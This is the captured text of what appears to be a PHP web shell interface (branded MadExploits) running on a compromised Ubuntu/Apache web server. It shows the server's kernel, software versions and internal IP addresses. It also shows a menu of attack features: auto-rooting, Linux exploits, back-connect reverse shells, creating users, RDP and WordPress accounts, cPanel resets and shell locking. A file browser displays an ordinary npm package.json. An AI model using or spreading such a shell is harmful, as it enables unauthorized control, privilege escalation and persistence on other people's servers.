Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
@swc /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
10.58
KB
-rw-r--r--
README.md
219
B
-rw-r--r--
assumptions.d.ts
2.58
KB
-rw-r--r--
assumptions.js
77
B
-rw-r--r--
index.d.ts
61.92
KB
-rw-r--r--
index.js
77
B
-rw-r--r--
package.json
931
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "@swc/types", "packageManager": "yarn@4.0.2", "version": "0.1.23", "description": "Typings for the swc project.", "types": "./index.d.ts", "sideEffects": false, "scripts": { "build": "tsc", "prepublishOnly": "yarn build" }, "repository": { "type": "git", "url": "git+https://github.com/swc-project/swc.git" }, "publishConfig": { "registry": "https://registry.npmjs.org/", "access": "public" }, "files": [ "*.js", "*.d.ts" ], "keywords": [ "swc", "types" ], "author": "강동윤 <kdy1997.dev@gmail.com>", "license": "Apache-2.0", "bugs": { "url": "https://github.com/swc-project/swc/issues" }, "homepage": "https://swc.rs", "devDependencies": { "typescript": "^5.2.2" }, "dependencies": { "@swc/counter": "^0.1.3" } }
Close